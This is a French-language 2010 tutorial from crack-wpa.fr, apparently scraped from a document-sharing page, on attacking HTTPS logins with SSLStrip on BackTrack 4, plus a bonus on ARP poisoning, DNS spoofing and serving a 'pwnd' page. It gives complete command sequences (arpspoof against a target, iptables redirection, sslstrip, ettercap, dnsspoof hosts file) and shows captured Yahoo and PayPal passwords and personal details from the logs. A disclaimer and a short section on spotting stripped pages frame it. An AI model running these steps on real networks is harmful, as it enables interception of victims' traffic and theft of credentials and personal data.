Sunteți pe pagina 1din 33

1° .Pour rappel, il est interdit de tester un réseau sans l’accord de son propriétaire !

2° .Pour le bon déroulement de ce tuto, il est aussi interdit de fumer, de filmer dans la
salle, ou de faire un appel à un ami.

BONNE SÉANCE

TUTO SSLSTRIP sous BT4 Final & Bonus.


ARP Poisoning + DNS Spoof + httpd

 crack-wpa.fr 2010 1
TABLE DES MATIERES
1. INTRODUCTION.
……… I. Préface
……… II. Prérequis
……… III. Intro SSLStrip
……………… .a Https et SLL: quelques explications
……………… .b SSLStrip: la naissance de l’outils
……………… .c Comment on arrive sur du Https
……… IV. Intro Arp Poisoning - Dns Spoof - httpd

2. SSLSTRIP…LE CONTACT.
……… I. SLStrip à quoi ça ressemble ?
……… II. Avant on se prépare !
……… III. Configuration
……… IV. SSLStrip en Pratique
………………… 1er Test sans SSLStrip
………………… 2eme Test avec SSLStrip
……… V. Les Logs

3. ARP POISONING - DNS SPOOF - HTTD.


……… I. Mini Intro
……… II. Les Etapes

4. RÉCAP DES COMMANDES.


……… I. SSLStrip
……… II. Arp Poisoning - Dns Spoof - httpd

1. INTRODUCTION
I. Préface

. Pour commencer, ce tuto fait suite à une série dont voici le 1 er


épisode Mdk3 by Antares145, bien entendu ce
lien est juste là à titre indicatif et donc pas nécessaire à la compréhension de ce tuto.

. Dans un souci de pédagogie purement ludique, je force volontairement sur le coté animation et je précise
encore une fois que ces tutos doivent être ouvert au plus grand nombre. Bienvenue aux N00b’z.

. Il n’a rien d’exceptionnel en soi c’est juste une compilation de donnés déjà existantes, dixit le tuto SSLStrip
de M1ck3y sur BT3. A quelques broutilles près, sur BT4 Final c’est la même chose.

. Certes pour les puristes et les habitués, pas besoin de toute cette mise en scène et de tout ce verbiage, vous
pouvez donc accéder directement à la section 4. dans la Table des Matières. Pour les N00b’z, la visite
continue... Onjoy !

II. Prérequis
. Tutoriel réalisé sous BackTrack 4 final.
. Une Maj de SSLStrip (facultatif, mais c’est toujours mieux d’avoir la dernière version)
. Les tests ont été effectués avec un adaptateur wifi usb Alfa AWUS036H 1000 mW.
 crack-wpa.fr 2010 2
III. Intro SSLStrip

. A travers ce tutoriel, nous allons voir comment il est possible de s'attaquer à une connexion encryptée (SSL)
grâce à SSLStrip qui va rediriger tout le trafic https vers du http en donnant l'illusion à la victime qu'elle
est bien sur une connexion sécurisée.

.a/ Https et SSL: quelques explications

. HTTPS pour (hyper text transfert protocol secured). Il est synonyme de connexion sécurisée et permet
d'encrypter des données sensibles afin d'éviter une éventuelle interception des données, exemple les sites web
bancaires. Grace à un système de certificats, le navigateur va pouvoir s'assurer que le site web auquel il est
connecté est bien celui qu'il prétend être.
Un tiers de confiance est utilisé pour cela, on l'appelle le CA (certificate authority). Pour résumer, c'est en
comparant le certificat du site sur lequel il est connecté et le certificat du CA (le tiers de confiance) que le
navigateur va s'assurer qu'il est bien connecté à un site sécurisé.
Le http classique utilise le port 80.
Le https utilise par défaut le port 443
Une fois connecté en https, les informations qui vont transiter entre le navigateur et le serveur web seront
encryptées via SSL (secured socket layer), un protocole de cryptage très sur permettant de sécuriser les données.

.b/ SSLStrip: la naissance de l'outil

. SSLStrip est un outil développé par Moxie Marlinspike, il est né d'un constat simple:
La majorité des utilisateurs ne regardent pas l'url affichée dans la barre d'adresse de leur navigateur, et quand il
leur apparait un message d'erreur la plupart du temps ils clickent sur ok sans savoir ce qu'ils font.

. Les utilisateurs se fient à une impression, un sentiment, un ressenti basé sur ce qu'ils voient:
- des indicateurs qui disent que la page est sécurisée
- des icones avec un cadenas qui apparaissent ici ou là
- la barre d'adresse qui change de couleur
Lorsque ces éléments sont réunis, l'utilisateur pense que la page est sécurisée (et franchement quel lambda
analyserait chaque page qu’il visite ?).

 crack-wpa.fr 2010 3
Donc quand on veut s'attaquer à du https, on fait en sorte de maintenir la confiance de l’utilisateur, et surtout de
ne pas éveiller sa suspicion en affichant un message d'alerte disant que le certificat n'a pas été émis par une
autorité approuvée ou autres messages qui pourraient paraitre anormale.
En résumé, pour duper l'utilisateur il ne faut pas lui afficher de messages d'alerte, et le maintenir dans un
environnement visuel qui va lui laisser penser qu'il est sur un site sécurisé.

Voici un schéma basique qui illustre son fonctionnement:

.c/ Comment les utilisateurs arrivent ils sur du https ?

. Très peu de personnes tapent directement https dans leur barre d'adresse, en fait les 2 façons classiques pour
arriver sur du https lors d’une navigation sur le web, sont :
- en clickant sur un lien
- en suivant une redirection (302)

. En effet, la plupart des sites proposant un contenu sécurisé en https, nous font dans un premier temps passer
par une page http (exemple: la page accueil) avant d'être redirigé vers une page sécurisée. C'est le cas sur les
sites bancaires, sur google mail, paypal etc...

. SSLStrip ne va pas attaquer le https, il va attaquer le http. Il va transformer tous les liens https sur le poste
victime en liens http, et garder en mémoire tout ce qui a changé en créant une map (carte).
Résultat:
- le serveur ne voit rien, pour lui la connexion est toujours encryptée
- le client ne voit aucun message d'alerte dans son navigateur
- l'attaquant peut sniffer toutes les données car elles transitent en clair

. Grace à ce procédé, il est très difficile de différencier la véritable page https cryptée via SSL de la fausse
page http renvoyée par SSLStrip.

. Cela dit, comme on l'a évoqué, les utilisateurs sont habitués à voir une image de cadenas lorsqu'ils basculent
sur une page sécurisée, cette icone représente à leurs yeux un gage de sécurité.
SSLStrip va donc falsifier les réponses aux requêtes favicon du navigateur et afficher en guise de favicon un
petit cadenas (une favicon est la petite image située à gauche de la barre d'adresse du navigateur) :

 crack-wpa.fr 2010 4
Le Petit Bonus !
IV. Intro ARP Poisoning + DNS Spoof + HTTPD
Est-ce une obligation après SSLStrip ?
Obligation… Bien sûr que non, tous deux ont une mission bien distincte et bien différente, l’un comme
l’autre peuvent être utilisés séparément, mais on verra qu’ils ont en commun la méthode MITM.
…Dans ce cas pourquoi son utilité ?
Utilité… Juste pour le coté ludique du challenge (cad : mettre une page de pwn).
Pour voir les similitudes MITM sur une autre technique qu’ SSLStrip.
Pour la culture générale. (…Et aussi, parce que j’en ai envie, et que j’fais s’que j’veux !)

Vu que c’est un petit Bonus, on ne va pas faire de tuto détaillé sur ce sujet, mais dans le cadre de notre "attaque"
on va juste en expliquer vite fait le principe et s’axé plus précisément sur la mise en place du dispositif.

Voici un schéma classique de connexion, un pc connecté en wifi sur un routeur pour surfer sur le web

La Mission :
Notre but est de se glisser subrepticement dans le réseau afin de récupérer le trafic et de rediriger
la victime sur une page "pwnd" ou "piégée" via notre server httpd.

La Technique du MITM (Man in the Middle) :


Et pour ce faire on va appliquer la méthode du MITM, c'est-à-dire qu’on va se placer entre la
Victime et le point d’accès… Mais pour l’instant on ne parlera que du principe, la méthode sera
pour plus tard.

ARP et ARP Poisoning :


Ici un très bon explicatif sur l’ARP et ARP Poisoning, mais grosso modo ce qui faut retenir dans
notre cas c’est que l'ARP Poisoning va nous permettre de faire admettre légitimement notre
MITM. (La Victime passe par notre machine en pensant que c’est le routeur et inversement
contrairement proportionnel de même avec le routeur… Bref j’espère que j’ai été assez clair)
 crack-wpa.fr 2010 5
Le DNS Spoof :
Dans notre cas de figure il servira à faire croire à la Victime qu'il se trouve sur un site internet
original, alors qu'il sera en réalité redirigé sur notre machine MITM et donc notre server.

Le rôle du Server HTTPD :


Une fois que notre dispositif de redirection est mis en place on va pouvoir faire en sorte que la
Victime visite notre page "pwnd" ou piégée "métasploit ¹" via notre serveur, d’où son utilité.
On pourrait éventuellement ne pas s’en servir mais le but n’est pas de faire juste de la simple
redirection d’url.
¹ Bref, on s’est compris… Donc pour notre challenge ça sera juste une page "pwnd", dsl.

Maintenant qu’on en sait un peu plus, revenons a notre aventure !

Previously in MIH (Mdk3 by Antares145)

 crack-wpa.fr 2010 6
2. SSLSTRIP…PREMIER CONTACT
I. SSLStrip à quoi ça ressemble ?
Etant donné qu’il est déjà installé sur BT4 on va pouvoir faire connaissance avec SslStrip :
A. Soit en passant par - Menu K  Backtrack  Privilege Escalation  All  SSLStrip

Une fenêtre Terminal SSLSTRIP s'ouvre en vous affichant directement toutes les commandes

B. Soit en ouvrant une Konsole de la barre des taches en bas à gauche, et on tape : root@bt :~# sslstrip -h

 crack-wpa.fr 2010 7
II. SSLStrip Préparation du Terrain
Maintenant qu'on a fait les présentations, on peut préparer le terrain. Et oui ! On n’arrive pas comme ça les
mains dans les poches. Avant toute chose on se pose les bonnes questions.

A. Heuuu… C’est quoi mon matos ?


 On sait déjà que pour ma part c’est un adaptateur wifi Alfa AWUS036H 1000 mW, mais afin
d'avoir un peu plus d’infos sur le périphérique à utiliser, on fait un petit : root@bt :~# ifconfig

Mon alfa se trouve en (wlan0), et on a l'ip (192.168.168.1.98) c'est pas important mais bon à savoir.

B. Ok ! Mais c’est qui la victime ?

 un scan avec nmap sur le réseau, histoire de trouver une cible : root@bt :~# nmap 192.168.1.0/24
Je vous mets directement le résultat : 192.168.1.99

On est presque paré il reste deux, trois bricoles à config et c’est parti.
 crack-wpa.fr 2010 8
III. SSLStrip et Configurations

A. Un peu de configuration
 pour faire de l'ARP Poisoning SSL, on va éditer le fichier "etter.conf" d'ettercap

...ok mais ou se trouve t'il ?


 pour le savoir voici une manip très simple (parmi tant d'autre) on ouvre un autre Terminal, et
on tape : root@bt :~# whereis etter.conf
Vous aurez normalement la réponse suivante "etter: /etc/etter.conf" ce qui nous donne le
chemin.

 Afin d'éditer le fichier "etter.conf", ouvrez un autre Terminal et taper :


root@bt :~# kate /etc/etter.conf
sinon kwrite (autre éditeur de texte), ou nano (édition en console), font aussi l'affaire.

! Attention ! Pour les étourdis et pour ceux qui ne le savent pas, si vous ouvrez un terminal SSLStrip via
Menu K  Backtrack  Privilege Escalation  All  SSLStrip, dans ce cas là ne lancez pas de commande
"kate" ou "kwrite" dans le même Terminal qu’ SSLStrip, sauf si vous éditez avec "nano", car vous aurez
l'erreur suivante :

 crack-wpa.fr 2010 9
Le fichier "etter.conf" ouvert, allez dans la section "Linux -> if you use iptables"

Enlevez le dièse '#' devant :

redir_command_on à la ligne 168


et
redir_command_off à la ligne 169

Enregistrez et sortez.

 crack-wpa.fr 2010 10
B. On active l’Ip Forwarding et on lance le MITM.
 L'Ip forwarding permet de faire transiter des paquets d'une interface réseau à une autre.

 Pour activer l'Ip forwarding, il faut ajouter la valeur 1 au fichier /proc/sys/net/ipv4/ip_forward


(cette valeur par défaut est à 0 ce qui signifie que l'Ip forwarding n'est pas activé). tapez :
root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward

 et on lance l'Arp Poisoning qui nous placera en situation de man in the middle sur le réseau :
root@bt :~# arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254

-i pour indiquer l’interface, donc wlan0


-t "target" pour indiquer la cible, donc 192.168.1.99
Suivi de l’host, donc dans ce cas l’AP 192.168.1.254

Arpsoof en action

C. La redirection du trafic avec iptables.


 Allez zou !.. Un peu de devoirs à faire a la maison Comprendre l’iptables et en ce qui nous
concerne la Cible REDIRECT

 dans une nouvelle fenêtre Terminal, tapez :


root@bt :~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
ou par exemple vous pouvez configurer un port différent, ex : 15000

 crack-wpa.fr 2010 11
IV. SSLStrip en pratique: test avec & sans SSLStrip

Prenons comme exemple la page login mail de Yahoo.com

 crack-wpa.fr 2010 12
1er test / sans SSLstrip
On lance à la suite d’iptables la commande ettercap: root@bt :~# ettercap -T -q -i wlan0
-T = lance ettercap en mode texte / -q = mode silence, pour pas se taper les requêtes dans le Terminal
/ -i = pour signifier une interface + (mon interface = wlan0)

Et on vérifie ce qui se passe dans l'explorateur de notre cible, en retournant sur la page de login mail Yahoo.com

Alllaaarrrmmmeeee !!!
La plupart des outils permettant d'effectuer une attaque man in the middle sur du SSL (https) fournissent au
navigateur de la machine victime un faux certificat SSL n'ayant pas été émis pour le site visité. Le résultat est
un message d'alerte dont voici deux exemples:

Avec Firefox :

 crack-wpa.fr 2010 13
Avec IE :

On arrêter proprement l'attaque, il faut appuyer sur la touche " q " (…pas besoin de filtre parental, ce n’est
qu’une touche sur un clavier)

2ème test / avec SSLstrip

 crack-wpa.fr 2010 14
(Inutile d’ouvrir un autre Terminal). Cette fois ci on lance la commande sslstrip: root@bt :~# sslstrip -a -k -f

! NOTE ! On a bien mis nos options :


-a pour logger toute les requêtes SSL et http / -k pour la session / -f pour le favicon

…Pourquoi ne pas ajouter -l ?


- Pour la simple raison qu’sslstrip écoute déjà par défaut le port 10000
- Petit rappel du 2.III.C, on a configuré la redirection du trafic iptables sur le port 10000, par contre si on
l’avait configuré sur le port 15000, on aurait la commande suivante : root@bt :~# sslstrip -a -k -f -l 15000

Vous remarquerez qu’en lançant cette commande un fichier sslstrip.log a été créé sur le bureau.

Maintenant qu’ SSLStrip est lancé, on re-test la commande ettercap,


on ouvre un autre Terminal: root@bt :~# ettercap -T -q -i wlan0

 crack-wpa.fr 2010 15
Et tous le monde fait Wouaaa !!!
Retournons voir notre cible… Et là ! C’est le bonheur et la stupéfaction car devant vos yeux ébahis et
émerveillés vous contemplez enfin toute la magie d’ SSLStrip.

Test avec Firefox :

Login : dr.dernfer@yahoo.fr

Pass : ************

 crack-wpa.fr 2010 16
Bien venu sur l’interface web mail du Dr.Denfer

Test avec IE :

Pour le test on a volontairement mis un pass erroné

 crack-wpa.fr 2010 17
Résultat : on le connait, mais ce qui est intéressant c’est de voir le Terminal ou le fichier sslstrip.log

Mais qu’est ce qui ce passe de notre coté ‘MITM’ ?


Regardons un petit peu notre terminal

A. Ici l’ip 217.12.8.76 est c’elle de la page de login de Yahoo mail via Firefox (voir screen plus
haut) sur lequel on a essayé de logger avec :
l’adresse dr.denfer@yahoo.fr
et le pass Austin.Power

B. Ici c’est la même ip donc même page mais via IE, avec un pass erroné pour l’exemple :
l’adresse dr.denfer@yahoo.fr
et le pass minimoi

Testé avec Firefox et IE sur un compte Yahoo… Et pourquoi pas sur un compte Paypal ? (Voir même lors de la
création du compte, les infos qui transpirent pourrait bien nous surprendre)

 crack-wpa.fr 2010 18
…Fini je Payplus !

. Nous allons maintenant voir ce qu'il se passe avec Paypal...


…Ouvrir un compte no soucy !

…Coté MITM ça donne quoi ?

Bref ! C’est la fête…

 crack-wpa.fr 2010 19
…Toujours aucun message d'alerte, bien au contraire. La victime va se connecter à son Paypal. Il arrive sur la
page d'accueil, en http:

. L'utilisateur clique sur le bouton "Connectez-vous", c'est là qu'il devrait normalement être redirigé vers du
https. Ici, on peut voir que la favicon représentant le cadenas est déjà affichée dans la barre d'adresse, et on
pourrait donc se croire sur un site sécurisé. Voici la page de login:

 crack-wpa.fr 2010 20
. La différence se situe au niveau de la barre d'adresse de l’explorateur. La vraie page sécurisée affiche
une adresse en https et la partie gauche de la barre devient verte (pour Paypal), en affichant le nom du
propriétaire du certificat SSL.
. Par contre sur la page "stripped" ou "leurre", l'adresse est en http classique, et on peut voir un cadenas sur
la gauche (ce n'est bien sur en réalité qu'une favicon, mais combien de personnes savent ce qu'est une favicon,
et surtout combien de personnes sont suffisamment attentives pour remarquer ce genre de petit détail, en plus,
jusqu'ici aucun message d'alerte n'a été affiché !). Notre cible continue à surfer, il valide son identifiant ainsi que
son mot de passe et se retrouve donc en toute logique connecté à son compte Paypal.

. Dans un autre exemple il se peut aussi que vous arriviez sur une page de login http (ex 1 : hotmail), et de voir
le https agir après que les identifiants soient validés : 2, (on voit un affichage du https d’une fraction de seconde
avant la redirection sur le compte : 3).

Petit Récap. pour mieux ce prémunir


Il faut donc dans la majorité des cas : vérifier l’adresse (donc https), de vérifier si ce n’est pas un Favicon bidon
(souvent c’est le logo du site en question), que la barre qui précède l’url
soit une zone colorée (vert, bleu...)

 crack-wpa.fr 2010 21
V. Les Logs
…Ok on à les login/pass de comptes sur des sites qui sont censé être sécurisés… Et c’est tout ?

Oullllaaa une septique ! Je vois que tu es une coquine toi et que tu en veux encore plus.
Dans un moment de grande mansuétude on va rajouter un tout p’tit bonus, mais juste parce que c’est toi.
Ce coup ci ça ne concerne plus le Terminal, mais les logs.

Un mail rien de plus anodin, exemple :

Pendant le MITM un mail à été reçu "…et alors moi aussi je reçois des mail, c’est quoi le rapport ?", (Pour
aller plus vite j’ai ciblé ma recherche, sinon lors d’une recherche à l’aveugle on ce tape une bonne partie du log
à lire).

 crack-wpa.fr 2010 22
En ouvrant le fichier de sslstrip.log, on peut trouver ceci :

On fait tous un autre Wouaaaouu !!!


Ça marche aussi avec Haaannn !!!

 crack-wpa.fr 2010 23
C’est-y pas mignon tout ça… J’en ai la larme à l’œil.

…Toujours pas convaincu ?


Vous vous rappelez certainement de la création du compte Paypal (voir screen plus haut), et si on jetait aussi un
coup d’œil sur les logs ?

SECURE POST Data (www.paypal.com)  Bref on aura compris d’où ça vien !

email=dr.denfer%40yahoo.fr  donc j’en déduit que le login est dr.denfer@yahoo.fr

password=Anstin.Power  pass Austin.Power

 crack-wpa.fr 2010 24
Jusque là pas de quoi sauter au plafond on avait déjà ces infos dans le Terminal, mais si en plus on avait
des infos perso sans se connecter sur le compte Paypal ;)

first_name=Dr&last_name=Denfer  Dr Denfer

adresse1=rue+du+Paradis  Rue du Paradis

zip=75000  code postal

city=DenferIsland  la ville

PhoneNumber=  le numéro de téléphone quand on le spécifie

Conclusion : On retrouve le login de l'utilisateur, le mot de passe (%40 est l'encodage ascii de @), le nom,
prénom, adresse complète, numéro de téléphone

. Dans une transparence quasi parfaite... Ce tutoriel illustre une fois de plus le danger des attaques man in the
middle, j'espère qu'il attirera votre attention sur le fait qu'il est extrêmement dangereux de se connecter à un
réseau "unsecured", qu'il s'agisse d'un hotspot ou autre. Si vous n'êtes pas sure à 100% du réseau sur lequel vous
êtes connecté, alors ne vous connectez pas à des sites sensibles, n'envoyez aucune donnée importante et surtout
soyez toujours vigilant lorsque vous vous connectez à un site sécurisé, la barre d'adresse doit clairement
indiquer https et non http.

3. BONUS ARP POISONING - DNS SPOOF - HTTD

I. Ici nous allons voir la mise en place du dispositif, mais si vous le faites dans la continuité d’SSLStrip
sachez adapter vos étapes (ex : Si cela avait déjà été fait depuis le début, ça ne sert à rien de refaire
un ifconfig, nmap, etc…).

Mais pour le principe j’explique la méthode depuis le début.

 crack-wpa.fr 2010 25
II. C’est parti mon kaïkaï !
A. On identifie la carte qui est connectée au net, ex : wlan0 : root@bt :~# ifconfig

B. On scan le réseau avec Nmap dans une Konsole, dans notre cas: root@bt :~# nmap 192.168.1.1/24
Résultat l’ip cible est 192.168.1.99

Toujours pareil

C. On lance "DSniff" dans - Menu K  Backtrack  Privilege Escalation  All  DSniff


Un Terminal s'ouvre et vous avez directement les commandes.

 crack-wpa.fr 2010 26
D. On lance l'ip forward dans le Terminal: root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward

E. on va ouvrir un autre onglet: arpspoof -i interface -t IP-Victim IP-Routeur

-i + interface = signifie l’interface à utiliser


-t = target/cible + ip-victime + ip-point d’accès

Et on tape: root@bt :~# arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254

F. On ouvre encore un autre onglet dans la console et on tape le contraire:


arpspoof -i interface -t IP-Routeur IP-Victim

Donc: root@bt :~# arpspoof -i wlan0 -t 192.168.1.254 192.168.1.99

 crack-wpa.fr 2010 27
G. On crée sur le bureau un fichier "ex : redirection.host" et on y met les infos de redirection, ex:

192.168.1.98 google.fr
192.168.1.98 google. com
192.168.1.98 www.youtube.com

Ou ex : (192.168.1.98 *.*) veut dire quel que soit le site ou ira la victime (bien entendu on parle de la racine de
l’url), elle sera redirigé vers notre ip, donc quand une victime ira sur www.youtube.com, google.fr, etc… Elle
sera automatiquement redirigée vers notre ip 192.168.1.98

H. On ouvre un autre onglet, on tape: root@bt :~# dnsspoof -i wlan0 -f redirection.host

I. pour la section serveur on place la page qui sera vu après la redirection, qu'on appellera
"index.html", une simple page "pwnd" à mettre dans le dossier "var/www"

 crack-wpa.fr 2010 28
J. On lance le server HTTPD dans - Menu K  Services  HTTPD  Start HTTPD

…Et on attend sagement que la cible visite une url de notre fichier redirection.host

Comme de par hasard !

Server HTTP2-D2 !

 crack-wpa.fr 2010 29
…Et si maintenant on allait faire un tour du coté de l’explorateur de notre cible ?

Google.fr

Google.com

www.youtube.com

 crack-wpa.fr 2010 30
www.crack-wpa.fr

Là par contre si on vérifie le fichier "redirection.host" crack-wpa.fr n’en fait pas parti et donc on peut y
accéder (…Il manquerait plus que ça !)

4. RÉCAP DES COMMANDES

I. SSLStrip - Commandes

A. Connaitre son matos : root@bt :~# ifconfig

B. Scanner le réseau : root@bt :~# nmap 192.168.1.0/24

C. Pour l’aide : root@bt :~# sslstrip –h

D. Config etter.conf d’ettercap

- Trouver : root@bt :~# whereis etter.conf


- Ouvrir le fichier : root@bt :~# kate /etc/etter.conf
- Allez dans la section "Linux -> if you use iptables", enlevez le dièse '#' devant :

redir_command_on à la ligne 168


et
redir_command_off à la ligne 169

E. Activez l'ip forwarding : root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward

F. On lance arpspoof : root@bt :~# arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254

-i pour indiquer l’interface, donc wlan0


-t pour indiquer la cible, donc 192.168.1.99
Suivi de l’host, donc dans ce cas l’AP 192.168.1.254

 crack-wpa.fr 2010 31
G. Définir iptables :
root@bt :~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

H. On lance sslstrip : root@bt :~# sslstrip -a -k –f

-a pour logger toute les requêtes SSL et http


-k pour la session
-f pour le favicon
-l pour le port en écoute 1000 par défaut (si différent, configurez aussi iptables)
sslstrip.log fichier de log par défaut sur le bureau (si différent, commande -w)

I. On lance Ettercap : root@bt :~# ettercap -T -q -i wlan0

-T = lance ettercap en mode texte


-q = mode silence, pour pas se taper les requêtes dans le Terminal
-i = pour signifier une interface + (mon interface = wlan0)

II. ARP Poisoning - Dns Spoof - HTTPD - Commandes

A. Connaitre son matos : root@bt :~# ifconfig

B. Scanner le réseau : root@bt :~# nmap 192.168.1.0/24

C. On lance "DSniff" : Menu K  Backtrack  Privilege Escalation  All  DSniff

D. Activez l'ip forwarding : root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward

E. On lance arpsoof : arpspoof -i interface -t IP-Victim IP-Routeur

-i pour indiquer l’interface, donc wlan0


-t pour indiquer la cible, donc 192.168.1.99
Suivi de l’host, donc dans ce cas l’AP 192.168.1.254
Et on tape: root@bt :~# arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254

On ouvre un autre onglet et on inverse : arpspoof -i interface -t IP-Routeur IP-Victim


Donc: root@bt :~# arpspoof -i wlan0 -t 192.168.1.254 192.168.1.99

F. On crée un fichier "ex : redirection.host" et on met les infos de redirection :

192.168.1.98 google.fr
192.168.1.98 google. Com
192.168.1.98 www.youtube.com
192.168.1.98 www.crack-wpa.fr

G. On lance dnspoof : root@bt :~# dnsspoof -i wlan0 -f redirection.host

H. Pour la section serveur : On place la page qui sera vu après la redirection, qu'on appellera
"index.html", une simple page "pwnd" à mettre dans "var/www".

I. On lance le server HTTPD : Menu K  Services  HTTPD  Start HTTPD

J. …That’s all !

 crack-wpa.fr 2010 32
 crack-wpa.fr 2010 33

S-ar putea să vă placă și